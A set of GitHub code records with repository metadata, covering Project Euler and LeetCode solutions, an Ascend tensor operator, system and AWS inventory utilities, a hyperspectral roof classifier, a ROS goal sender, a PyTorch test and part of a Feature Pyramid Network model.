13 → 10 → 1 �� 1\n85 → 89 → 145 → 42 → 20 → 4 → 16 → 37 → 58 → 89\n\nTherefore any chain that arrives at 1 or 89 will become stuck in an endless loop. 
What is most amazing is that EVERY starting number will eventually arrive at 1 or 89.\n\nHow many starting numbers below ten million will arrive at 89?\n\n\"\"\"\n\nimport timeit\n\nstart = timeit.default_timer()\n\nsquares = {str(i): i**2 for i in range(10)}\nmemo = {}\nfor i in range(1, 600):\n    x = i\n    while x != 89 and x != 1:\n        x = sum(map(squares.get, str(x)))\n    memo[i] = 1 if x == 89 else 0\n\ncount = 0\nfor i in range(1, 10000000):\n    count += memo[sum(map(squares.get, str(i)))]\n\nprint(count)\nstop = timeit.default_timer()\nprint('Runtime:', stop - start)","repo_name":"tomlinsonk/euler","sub_path":"problem092/problem092.py","file_name":"problem092.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8644356736","text":"import te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\n\n\n@fusion_manager.register(\"segment_prod\")\ndef segment_prod_compute(input_x, input_y, output_y, kernel_name=\"segment_prod\"):\n    \"\"\"\n    calculating data\n\n    Parameters\n    ----------\n    input_x : TVM tensor\n        the placeholder of input_x\n    input_y : list\n        segment_ids\n    output_y : dict\n        dict of output_y, include keys(shape and dtype)\n    kernel_name : str\n        kernel name, default value is \"segment_prod\"\n\n    Returns\n    -------\n    res : output of the data's segment_prod, shape is (input_y[-1]+1, XXX),\n        XXX is the same as input_x shape from the second dimension to the end dimension\n    \"\"\"\n\n    res = te.lang.cce.unsorted_segment_prod(input_x, input_y, input_y[-1]+1, init_value=1)\n    return res\n\n\n@util.check_input_type(dict, list, dict, str)\ndef segment_prod(input_data, segment_ids, output_data, kernel_name=\"segment_prod\"):\n    \"\"\"\n    algorithm: segment_prod\n    calculating data\n\n    Parameters\n    ----------\n    input_data : dict\n        shape and dtype of first input, only support float16, float32\n    segment_ids : list\n        shape and dtype of second input, only support int32\n        size is equal to the size of input_data first dimension\n        values should be sorted and can be repeated\n    output_data : dict\n        shape and dtype of output,\n    kernel_name : str\n        kernel name, default value is \"segment_prod\"\n\n    Returns\n    -------\n    None\n    \"\"\"\n\n    shape_data = input_data.get(\"shape\")\n    shape_segment = (len(segment_ids),)\n    dtype_data = input_data.get(\"dtype\").lower()\n\n    util.check_kernel_name(kernel_name)\n    util.check_shape_rule(shape_data)\n    util.check_shape_rule(shape_segment)\n    util.check_tensor_shape_size(shape_data)\n    util.check_tensor_shape_size(shape_segment)\n\n    check_tuple_data = (\"float16\", \"float32\", \"int8\", \"int32\")\n    util.check_dtype_rule(dtype_data, check_tuple_data)\n\n    if shape_segment[0] != shape_data[0]:\n        raise RuntimeError(\"the size of input_segment should equal the size of data's first dimension\")\n\n    for i in range(shape_segment[0]):\n        if not isinstance(segment_ids[i], int):\n            raise RuntimeError(\"input_segment should be 1-D and all int!\")\n        if segment_ids[i] < 0:\n            raise RuntimeError(\"input_segment should not be less than 0!\")\n        if i > 0 and segment_ids[i] < segment_ids[i - 1]:\n            raise RuntimeError(\"input_segment should be sorted\")\n\n    if dtype_data == \"int8\":\n        # int8 is computed in float16 and cast back to int8 below\n        data_input = tvm.placeholder(shape_data, name=\"data_input\", dtype=\"float16\")\n        res = segment_prod_compute(data_input, segment_ids, output_data, kernel_name)\n        res = te.lang.cce.cast_to(res, \"int8\")\n    else:\n        data_input = 
tvm.placeholder(shape_data, name=\"data_input\", dtype=dtype_data)\n        res = segment_prod_compute(data_input, segment_ids, output_data, kernel_name)\n\n\n    with tvm.target.cce():\n        schedule = generic.auto_schedule(res)\n\n    config = {\"name\": kernel_name,\n              \"tensor_list\": [data_input, res]}\n\n    te.lang.cce.cce_build_code(schedule, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/segment_prod.py","file_name":"segment_prod.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26631735758","text":"global subprocess\nglobal os, time\n\nimport subprocess\nimport os, time\n\ndef verificar_ram():\n\tresultado = subprocess.run(['free', '-m'], capture_output=True, text=True)\n\tsaida = resultado.stdout.strip().split('\\n')\n\tcabecalho = saida[0].split()\n\tvalores = saida[1].split()\n\n\tram_total = int(valores[1])\n\tram_usada = int(valores[2])\n\tram_livre = int(valores[3])\n\n\tprint(f\"Information for RAM Memory:\\n\")\n\tprint(f\"Installed: {ram_total} MB\")\n\tprint(f\"Used: {ram_usada} MB\")\n\tprint(f\"Free: {ram_livre} MB\")\n\nif os.name == \"posix\":\n\twhile True:\n\t\ttry: os.system(\"clear\"), verificar_ram(), time.sleep(0.6)\n\t\texcept (KeyboardInterrupt, EOFError): break\n\nelse: print(\"ram: only available for Linux systems.\")\n\n","repo_name":"fetuber4095/OpenTTY","sub_path":"xbin/ram.py","file_name":"ram.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21391567337","text":"# RDS service\n\n#\n# Imports\n#\n# from .Aws import Aws\nfrom ..AwsService import AwsService\nfrom .instance.Instance import Instance\nfrom ...Console import console\n\n#\n# Rds class\n#\nclass Rds(AwsService):\n    _db_instance_increments :list   # List of RDS instance increments in use\n    _config : dict                  # AWS service configuration\n\n    def __init__(self, config :dict={}):\n        config[\"id\"] = \"rds\"\n        config[\"name\"] = \"RDS\"\n        config[\"resource_types\"] = [\"db_instance\"]\n        if \"filters\" in config:\n            if \"resource_types\" in config[\"filters\"]:\n                config[\"resource_types\"] = config[\"filters\"][\"resource_types\"]\n        self._is_regional = True\n        super().__init__(config=config)\n        \n        self._db_instance_increments = []\n        \n    def LoadResources(self) -> dict:\n        nb_instances = 0\n        self._resources['all'] = {}\n        for my_client in self._clients:\n            nb_resources_client = 0\n            console.Debug(f\"  Loading : {my_client.Name()}\", newline=False)\n\n            for my_resource_type in self._config[\"resource_types\"]:\n                if my_resource_type == \"db_instance\":\n                    nb_instances = 0\n\n                    for my_instance in my_client.Client().describe_db_instances()['DBInstances']:\n                        nb_instances = nb_instances + 1\n\n                        new_resource = Instance(instance=my_instance, client=my_client) # type: ignore\n                        new_resource.SetProperty('profile', my_client.Profile())\n\n                        self._resources[my_resource_type][new_resource.Id()] = new_resource\n                        self._resources['all'][new_resource.Id()] = new_resource\n                        nb_resources_client += 1\n\n                        if not new_resource.GetProperty('increment') in self._db_instance_increments:\n                            self._db_instance_increments.append(new_resource.GetProperty('increment'))\n            self._summary['instances'] = str(nb_instances)\n            console.Debug(f\" ==> {nb_resources_client} resources.\")\n\n        return self._resources\n\n    def NextInstanceIncrement(self):\n        if len(self._db_instance_increments) > 0:\n            for i in range(1, 
max(self._db_instance_increments)):\n                if not i in self._db_instance_increments:\n                    return i\n            return len(self._db_instance_increments) + 1\n\n    def Print(self):\n        self._summary['available increment'] = self.NextInstanceIncrement()\n        super().Print()\n","repo_name":"espadrille/inventory","sub_path":"inventory/aws/rds/Rds.py","file_name":"Rds.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39221045941","text":"import logging\nimport os\nimport shutil\nimport tempfile\nimport zipfile\nimport googkit.lib.clone\nimport googkit.lib.path\nfrom googkit.commands.command import Command\nfrom googkit.compat.urllib import request\nfrom googkit.lib.dirutil import working_directory\nfrom googkit.lib.error import GoogkitError\nfrom googkit.lib.i18n import _\n\n\nclass DownloadCommand(Command):\n    @classmethod\n    def needs_project_config(cls):\n        return True\n\n    def download_closure_library(self):\n        \"\"\"Downloads Closure Library resources to the library root that is defined in a config file.\n        \"\"\"\n        library_repos = self.config.library_repos()\n        library_root = self.config.library_root()\n\n        logging.info(_('Downloading Closure Library...'))\n\n        try:\n            googkit.lib.clone.run(library_repos, library_root)\n        except GoogkitError as e:\n            raise GoogkitError(\n                _('Downloading Closure Library failed: {message}').format(\n                    message=str(e)))\n\n        logging.info('Done.')\n\n    def download_closure_compiler(self):\n        \"\"\"Downloads Closure Compiler resources to the compiler root that is defined in a config file.\n        \"\"\"\n        tmp_path = tempfile.mkdtemp()\n        compiler_zip = os.path.join(tmp_path, 'compiler.zip')\n        compiler_zip_url = self.config.compiler_zip()\n\n        logging.info(_('Downloading Closure Compiler...'))\n\n        try:\n            request.urlretrieve(compiler_zip_url, compiler_zip)\n        except IOError as e:\n            raise GoogkitError(\n                _('Downloading Closure Compiler failed: {message}').format(\n                    message=str(e)))\n\n        compiler_root = self.config.compiler_root()\n\n        os.path.join('tools', 'sub', 'unzip.py')\n\n        with zipfile.ZipFile(compiler_zip) as z:\n            z.extractall(compiler_root)\n\n        shutil.rmtree(tmp_path)\n\n        logging.info(_('Done.'))\n\n    def run_internal(self):\n        project_root = googkit.lib.path.project_root(self.env.cwd)\n        with working_directory(project_root):\n            self.download_closure_library()\n            self.download_closure_compiler()\n","repo_name":"googkit/googkit","sub_path":"googkit/commands/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"20942958657","text":"# Given an array of integers nums and an integer target, return indices of the\n# two numbers such that they add up to target. \n# \n#  You may assume that each input would have exactly one solution, and you may\n# not use the same element twice. \n# \n#  You can return the answer in any order. \n# \n# \n#  Example 1: \n# \n# \n# Input: nums = [2,7,11,15], target = 9\n# Output: [0,1]\n# Explanation: Because nums[0] + nums[1] == 9, we return [0, 1].\n# \n# \n#  Example 2: \n# \n# \n# Input: nums = [3,2,4], target = 6\n# Output: [1,2]\n# \n# \n#  Example 3: \n# \n# \n# Input: nums = [3,3], target = 6\n# Output: [0,1]\n# \n# \n# \n#  Constraints: \n# \n# \n#  2 <= nums.length <= 10^4 \n#  -10^9 <= nums[i] <= 10^9 \n#  -10^9 <= target <= 10^9 \n#  Only one valid answer exists. 
\n# \n# \n# \n# Follow-up: Can you come up with an algorithm that is less than O(n^2) time\n# complexity? Related Topics Array Hash Table \n# 👍 29659 👎 938\n\n\nclass Solution(object):\n    def twoSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        temp_dict = {}\n        for i in range(len(nums)):\n            complement = target - nums[i]\n            if complement in temp_dict:\n                # the complement was stored with its index on an earlier iteration\n                return [temp_dict[complement], i]\n            temp_dict[nums[i]] = i\n        return []\n\n\ndef _test():\n    input_list = [2,7,11,15]\n    target = 9\n    result = Solution().twoSum(input_list, target)\n    print(\"input list: \",input_list, \"target: \",target, \"result: \", result)\n\n\nif __name__ == '__main__':\n    _test()\n","repo_name":"sportzhang/Algorithm","sub_path":"leetcode/editor/en/[1]Two Sum.py","file_name":"[1]Two Sum.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23241117185","text":"# Given a 2D grid made up of '1's (land) and '0's (water), count the number of islands.\n#\n# An island is always surrounded by water and is formed by connecting adjacent land cells\n# horizontally and/or vertically.\n#\n# In addition, you may assume that all four edges of the grid are surrounded by water.\n#\n\nfrom typing import List\n\ngrid = [\n    [\"1\",\"1\",\"1\",\"1\",\"0\"],\n
[\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n]\n\n# 深度优先搜索\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n numRows = len(grid)\n numCols = len(grid[0])\n count = 0\n\n def dfs(grid, i, j):\n if i < 0 or i > numRows - 1 or j < 0 or j > numCols - 1:\n return\n if grid[i][j] == \"1\":\n grid[i][j] = \"0\"\n dfs(grid, i - 1, j)\n dfs(grid, i + 1, j)\n dfs(grid, i, j - 1)\n dfs(grid, i, j + 1)\n\n for i in range(numRows):\n for j in range(numCols):\n if grid[i][j] == \"1\":\n count += 1\n dfs(grid, i, j)\n\n return count\n\n\"\"\"\n# 二刷,dfs\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n numRows = len(grid)\n numCols = len(grid[0])\n count = 0\n\n def dfs(i, j):\n grid[i][j] = \"0\"\n # 上\n if i > 0 and grid[i - 1][j] == \"1\":\n dfs(i - 1, j)\n # 下\n if i < numRows - 1 and grid[i + 1][j] == \"1\":\n dfs(i + 1, j)\n # 左\n if j > 0 and grid[i][j - 1] == \"1\":\n dfs(i, j - 1)\n # 右\n if j < numCols - 1 and grid[i][j + 1] == \"1\":\n dfs(i, j + 1)\n \n for i in range(numRows):\n for j in range(numCols):\n if grid[i][j] == \"1\":\n count += 1\n dfs(i, j)\n return count\n\"\"\"","repo_name":"vandeppce/algorithm","sub_path":"12.graph/200NumIslands.py","file_name":"200NumIslands.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"307019096","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 11 14:00:52 2022\n\n@author: Stian\n\"\"\"\n\n# Find map based on field work\n\n\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nimport spectral\nimport matplotlib.pyplot as plt\n\nimport spectral.io.envi as envi\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.decomposition import PCA\n\nfrom matplotlib import cm\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import make_pipeline\n\nfrom mycolorpy import colorlist as mcp\n\nbreak\n\n# =============================================================================\n# Load data labels\n# =============================================================================\n\nspec_lib = envi.open(\"E:/M-DV-STeien/juni2021/04/hs/2021_04_roofs_classes.hdr\")\narea = spec_lib.asarray()\narea = area.reshape(area.shape[0], area.shape[1])\n\nroofs = Image.open(\"E:/M-DV-STeien/databaseFKB2019/04/04_bygning_30cm.tif\")\nroofs = np.array(roofs)\n\n# =============================================================================\n# Load data HS \n# =============================================================================\n\nvnir_raw = spectral.open_image(\"E:/M-DV-STeien/juni2021/04/hs/VNIR30cm/2021_04_vnir30cm.hdr\")\nswir_raw = spectral.open_image(\"E:/M-DV-STeien/juni2021/04/hs/SWIR30cm/2021_04_swir30cm.hdr\")\n\nvnir = spectral.SpyFile.load(vnir_raw)\nswir = spectral.SpyFile.load(swir_raw)\n\nhs = np.dstack([vnir, swir])\n\nplt.imshow(np.dstack([hs[:,:,76],hs[:,:,46],hs[:,:,21]])/2500)\n\n# =============================================================================\n# Plot area image with nice colors\n# =============================================================================\n\nclasses = [\"None\", \"black concrete\", \"metal roofing\", 
\"black ceramic\", \"brown concrete\", \n \"red concrete\", \"gravel\", \"green ceramic\", \"pcv\", \"tar roofing paper\"]\ncolormap = ListedColormap([\"black\", \"red\", \"green\", \"yellow\", \"cyan\", \"maroon\",\n \"magenta\", \"seagreen\", \"purple\", \"blue\"])\nfig, ax = plt.subplots()\nimg = ax.imshow(area, cmap=colormap)\nplt.show()\n\n\n# =============================================================================\n# Take out pixels of interests\n# =============================================================================\n\nhs[area==0]=0\n\nX = hs[hs[:,:,0]!=0]\ny = area[area!=0]\n\n# =============================================================================\n# Machine learning\n# =============================================================================\nlr = LogisticRegression()\nsvc = SVC()\nknn = KNeighborsClassifier()\nrf = RandomForestClassifier()\n\nfor estimator, name in [(lr, \"lr\"),\n (svc, \"svc\"),\n (knn, \"knn\"),\n (rf, \"rf\")]:\n pl = make_pipeline(#StandardScaler(), \n PCA(n_components=10),\n estimator)\n \n pl.fit(X,y)\n print(f\"{name}: {pl.score(X,y)}\")\n# lr = LogisticRegression(C=1)\n# lr.fit(X,\n# y)\n\n# rf = RandomForestClassifier(verbose=1)\n# rf.fit(X,\n# y)\n\n# =============================================================================\n# C for lr\n# =============================================================================\nC = [2,3,4,5,10,50,100]\nfor c in C:\n lr = LogisticRegression()\n pl = make_pipeline(#StandardScaler(), \n PCA(n_components=c),\n lr)\n \n pl.fit(X,y)\n print(c, pl.score(X,y))\n\n\n# =============================================================================\n# Predict\n# =============================================================================\n\n\npred = pl.predict(hs.reshape((hs.shape[0]*hs.shape[1],\n hs.shape[2]))).reshape(hs.shape[0],hs.shape[1])\n\npred[roofs<0.01] = 0\nplt.imshow(pred, cmap=colormap)\n\n\n# =============================================================================\n# Only use field work as pred\n# =============================================================================\n\narea = np.array(area)\narea[roofs<0.01] = 10\narea += 1\narea[area==11] = 0\nplt.imshow(area) \n\nnp.save(\"roof_map.npy\", area)\n\n\n\n","repo_name":"stianteien/M_DV_V2022","sub_path":"spectral_library/ml_fieldspeclib.py","file_name":"ml_fieldspeclib.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4386205095","text":"#!/usr/bin/env python\n\nimport math\nimport os\nimport time\nimport rospy\nimport rosgraph\nfrom geometry_msgs.msg import PoseStamped\nfrom snapstack_msgs.msg import State\nimport numpy as np\nfrom random import * \n\nclass TermGoalSender:\n\n def __init__(self):\n\n # home yet?\n self.is_home = False\n\n # position change\n self.sign = 1\n\n # initialization done?\n self.is_init_pos = False\n\n # reached goal?\n self.if_arrived = False\n\n # term_goal init\n self.term_goal=PoseStamped()\n self.term_goal.header.frame_id='world'\n self.pubTermGoal = rospy.Publisher('term_goal', PoseStamped, queue_size=1, latch=True)\n \n # state_pos init ()\n self.state_pos=np.array([0.0, 0.0, 0.0])\n\n # waypoints\n self.wpidx = 0\n self.wps = np.array([\n [-3.0, 3.0, 2.0],\n [3.0, -3.0, 2.0]\n ])\n\n # every 10 sec change goals\n rospy.Timer(rospy.Duration(10.0), self.change_goal)\n\n # set initial time and how long the demo is\n self.time_init = rospy.get_rostime()\n self.total_secs = 60.0; # 
sec\n\n # every 0.01 sec timerCB is called back\n self.is_change_goal = True\n self.timer = rospy.Timer(rospy.Duration(0.01), self.timerCB)\n\n # send goal\n self.sendGoal()\n\n def change_goal(self, tmp):\n self.is_change_goal = True\n \n\n def timerCB(self, tmp):\n \n # check if we should go home\n duration = rospy.get_rostime() - self.time_init\n if (duration.to_sec() > self.total_secs and not self.is_home):\n self.is_home = True\n self.sendGoal()\n\n # term_goal in array form\n self.term_goal_pos=np.array([self.term_goal.pose.position.x,self.term_goal.pose.position.y,self.term_goal.pose.position.z])\n\n # distance\n dist=np.linalg.norm(self.term_goal_pos-self.state_pos)\n #print(\"dist=\", dist)\n\n # check distance and if it's close enough publish new term_goal\n dist_limit = 0.5\n if (dist < dist_limit):\n if not self.is_home:\n self.sendGoal()\n\n def sendGoal(self):\n\n if self.is_home:\n \n print (\"Home Return\")\n # set home goals\n self.term_goal.pose.position.x = self.init_pos[0]\n self.term_goal.pose.position.y = self.init_pos[1]\n self.term_goal.pose.position.z = 1.8\n\n else: \n\n # set goals (exact position exchange, this could lead to drones going to exact same locations)\n self.term_goal.pose.position.x = self.wps[self.wpidx % 2][0]\n self.term_goal.pose.position.y = self.wps[self.wpidx % 2][1]\n self.term_goal.pose.position.z = self.wps[self.wpidx % 2][2] \n\n self.if_arrived = not self.if_arrived\n self.wpidx += 1\n\n self.pubTermGoal.publish(self.term_goal)\n\n return\n\n def stateCB(self, data):\n if not self.is_init_pos:\n self.init_pos = np.array([data.pos.x, data.pos.y, data.pos.z])\n self.is_init_pos = True\n\n self.state_pos = np.array([data.pos.x, data.pos.y, data.pos.z])\n\ndef startNode():\n c = TermGoalSender()\n rospy.Subscriber(\"state\", State, c.stateCB)\n rospy.spin()\n\nif __name__ == '__main__':\n rospy.init_node('TermGoalSender')\n startNode()","repo_name":"mit-acl/puma","sub_path":"puma/scripts/hw_goal.py","file_name":"hw_goal.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"42589426322","text":"#pytorch tests\nimport numpy as np \nimport xlrd\nimport torch\n\ndtype = torch.float\n#device = torch.device(\"cpu\")\ndevice = torch.device(\"cuda:0\")\n\n\nload_e = []\nload_h = []\nload_c = []\nt_db = []\nirrad = []\n\nwb = xlrd.open_workbook('Campus_loads_weather.xlsx')\nsheet = wb.sheet_by_index(0)\ninputs= torch.zeros(sheet.nrows-3,5, device=device, dtype=dtype)\nfor row in range(2,sheet.nrows-1):\n inputs[row-2,0] = sheet.cell_value(row,1)/sheet.cell_value(1,6)#E_dem\n inputs[row-2,1] = sheet.cell_value(row,2)/sheet.cell_value(1,7)#H_dem\n inputs[row-2,2] = sheet.cell_value(row,3)/sheet.cell_value(1,8)#C_dem\n inputs[row-2,3] = sheet.cell_value(row,4)/sheet.cell_value(1,9)#Temp_db_C\n inputs[row-2,4] = sheet.cell_value(row,5)/sheet.cell_value(1,10)#Direct_normal_irradiance\n # load_e.append(row)\n # load_h.append(row[1])\n # load_c.append(row[2])\n # t_db.append(row[3])\n # irrad.append(row[4])\n # inputs.append(row)\n\nprint('inputs read')\n\nwb = xlrd.open_workbook('Campus_MI_18component.xlsx')\nsheet = wb.sheet_by_index(0)\ndisp = torch.zeros(sheet.nrows-2,14, device=device, dtype=dtype)\nfor row in range(1,sheet.nrows-1):\n r = row-1\n disp[r,0] = sheet.cell_value(row,2)/7000#GT1\n disp[r,1] = sheet.cell_value(row,3)/5000#GT2\n disp[r,2] = sheet.cell_value(row,4)/2000#FC1\n disp[r,3] = sheet.cell_value(row,5)/2000#FC2\n disp[r,4] = 
sheet.cell_value(row,6)/500#sGT\n    disp[r,5] = sheet.cell_value(row,7)/1500#Diesel\n    disp[r,6] = sheet.cell_value(row,8)/20000#Heater\n    disp[r,7] = sheet.cell_value(row,9)/10000#chiller1\n    disp[r,8] = sheet.cell_value(row,10)/10000#chiller2\n    disp[r,9] = sheet.cell_value(row,11)/7500#small Chiller1\n    disp[r,10] = sheet.cell_value(row,12)/7500#small Chiller2\n    disp[r,11] = sheet.cell_value(row,13)/30000#battery\n    disp[r,12] = sheet.cell_value(row,14)/75000#hot water tank\n    disp[r,13] = sheet.cell_value(row,15)/20000#cold water tank\n\nprint('outputs read')\n\n\n# disp = []\n# with open('Campus_MI_18component.xlsx') as csvfile:\n#     dispreader = csv.reader(csvfile)\n#     for row in loadreader:\n#         disp.append(row)\n\n# batch size, input dimension, hidden dimension (mean of in/out dims), output dimension\nN, D_in, H, D_out = len(inputs[:,0]), len(inputs[0,:]), int(np.ceil((len(inputs[0,:]) + len(disp[0,:])) / 2)), len(disp[0,:])\n\nx = inputs\ny = disp\nw1 = torch.randn(D_in, H, device=device, dtype=dtype, requires_grad=True)\nw3 = torch.randn(H, D_out, device=device, dtype=dtype, requires_grad=True)\nw2 = torch.randn(H,H, device=device, dtype=dtype, requires_grad=True)\n\nlearning_rate = 1e-6\nfor t in range(100000):\n    #forward:\n    y_pred = x.mm(w1).clamp(min=0).mm(w2).clamp(min=0).mm(w3)\n    #Forward pass: compute predicted dispatch\n    # h = x.mm(w1)\n    # h_relu = h.clamp(min=0)\n    # y_pred = h_relu.mm(w2)\n\n    # #compute and print loss\n    # loss = (y_pred-y).pow(2).sum().item()\n    # print(t,loss)\n    loss = (y_pred-y).pow(2).sum()\n    print(t, loss.item())\n\n    # #Backprop to compute gradients of w1 and w2 with respect to loss\n    # grad_y_pred = 2.0*(y_pred-y)\n    # grad_w2 = h_relu.t().mm(grad_y_pred)\n    # grad_h_relu = grad_y_pred.mm(w2.t())\n    # grad_h = grad_h_relu.clone()\n    # grad_h[h <0] =0\n    # grad_w1 = x.t().mm(grad_h)\n    loss.backward()\n\n    # #update weights\n    # w1 -= learning_rate * grad_w1\n    # w2 -= learning_rate*grad_w2\n    with torch.no_grad():\n        w1 -= learning_rate*w1.grad\n        w2 -= learning_rate*w2.grad\n        w3 -= learning_rate*w3.grad\n\n        #manually zero the gradients after updating weights\n        w1.grad.zero_()\n        w2.grad.zero_()\n        w3.grad.zero_()\n\n","repo_name":"nadiavp/NeuralNetwork","sub_path":"NN_for_dispatch/test_pytorch.py","file_name":"test_pytorch.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"38457666979","text":"from keras.models import *\r\nfrom keras.layers import *\r\nfrom fpn_network import ResNet, DataGenerator\r\nimport tensorflow as tf\r\nfrom fpn_network import model_utils\r\nimport os\r\nimport re\r\nimport datetime\r\nfrom fpn_network import utils\r\nfrom fpn_network.ProposalLayer import ProposalLayer\r\nfrom fpn_network.DetectionLayer import DetectionLayer\r\nfrom fpn_network.DetectionTargetLayer import DetectionTargetLayer\r\nfrom fpn_network import FeaturePyramidNetwork\r\nfrom fpn_network import Loss_Functions\r\nfrom fpn_network import RegionProposalNetwork\r\nimport keras\r\nimport multiprocessing\r\n\r\n\r\ndef log(text, array=None):\r\n    \"\"\"Prints a text message. 
And, optionally, if a Numpy array is provided it\r\n    prints its shape, min, and max values.\r\n    \"\"\"\r\n    if array is not None:\r\n        text = text.ljust(25)\r\n        text += (\"shape: {:20}  min: {:10.5f}  max: {:10.5f}  {}\".format(\r\n            str(array.shape),\r\n            array.min() if array.size else \"\",\r\n            array.max() if array.size else \"\",\r\n            array.dtype))\r\n    print(text)\r\n\r\n\r\nclass FPN():\r\n    def __init__(self, mode, config, model_dir):\r\n        self.mode = mode\r\n        self.config = config\r\n        self.model_dir = model_dir\r\n        self.set_log_dir()\r\n        self.keras_model = self.build_model(mode=mode, config=config)\r\n\r\n    def build_model(self, mode, config):\r\n        # resnet_arch = \"resnet101\"\r\n        # use_stage_5 = True\r\n        # train_bn = False, using a small batch size\r\n\r\n        assert mode in ['training', 'inference']\r\n\r\n        input_image = Input(shape=(None, None, 3), name=\"input_image\")\r\n        input_image_meta = Input(shape=[config.IMAGE_META_SIZE], name=\"input_image_meta\")\r\n\r\n        if mode == \"training\":\r\n            # RPN GT\r\n            input_rpn_match = Input(\r\n                shape=[None, 1], name=\"input_rpn_match\", dtype=tf.int32)\r\n            input_rpn_bbox = Input(\r\n                shape=[None, 4], name=\"input_rpn_bbox\", dtype=tf.float32)\r\n\r\n            # Detection GT (class IDs, bounding boxes, and masks)\r\n            # 1. GT Class IDs (zero padded)\r\n            input_gt_class_ids = Input(\r\n                shape=[None], name=\"input_gt_class_ids\", dtype=tf.int32)\r\n            # 2. GT Boxes in pixels (zero padded)\r\n            # [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in image coordinates\r\n            input_gt_boxes = Input(\r\n                shape=[None, 4], name=\"input_gt_boxes\", dtype=tf.float32)\r\n            # Normalize coordinates\r\n            gt_boxes = Lambda(lambda x: model_utils.norm_boxes_graph(\r\n                x, K.shape(input_image)[1:3]))(input_gt_boxes)\r\n        elif mode == \"inference\":\r\n            # Anchors in normalized coordinates\r\n            input_anchors = Input(shape=[None, 4], name=\"input_anchors\")\r\n\r\n        # Build the shared convolutional layers.\r\n        # Bottom-up Layers\r\n        # Returns the last layer of each stage, 5 in total (stage5=True);\r\n        # the stem output (C1) is discarded and C2-C5 feed the FPN below.\r\n        if callable(config.BACKBONE):\r\n            _, C2, C3, C4, C5 = config.BACKBONE(input_image, stage5=True,\r\n                                                train_bn=config.TRAIN_BN)\r\n        else:\r\n            _, C2, C3, C4, C5 = ResNet.resnet_graph(input_image, config.BACKBONE,\r\n                                                    stage5=True, train_bn=config.TRAIN_BN)\r\n\r\n        # Top-down Layers\r\n        P5 = Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c5p5')(C5)\r\n        P4 = Add(name=\"fpn_p4add\")([UpSampling2D(size=(2, 2), name=\"fpn_p5upsampled\")(P5),\r\n                                    Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c4p4')(C4)])\r\n        P3 = Add(name=\"fpn_p3add\")([UpSampling2D(size=(2, 2), name=\"fpn_p4upsampled\")(P4),\r\n                                    Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c3p3')(C3)])\r\n        P2 = Add(name=\"fpn_p2add\")([UpSampling2D(size=(2, 2), name=\"fpn_p3upsampled\")(P3),\r\n                                    Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c2p2')(C2)])\r\n\r\n        # Attach 3x3 conv to all P layers to get the final feature maps.\r\n        P2 = Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p2\")(P2)\r\n        P3 = Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p3\")(P3)\r\n        P4 = Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p4\")(P4)\r\n        P5 = Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p5\")(P5)\r\n
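        # For orientation, the merge above follows the standard FPN recurrence\r\n        # (illustrative pseudo-code, not runnable; Ci/Pi are the tensors above):\r\n        #   P5 = Conv1x1(C5)\r\n        #   Pi = Upsample2x(P_{i+1}) + Conv1x1(Ci)   for i = 4, 3, 2\r\n        #   Pi = Conv3x3(Pi)  # smooth upsampling artifacts\r\n        # P6 is used for the 5th anchor scale in RPN. 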
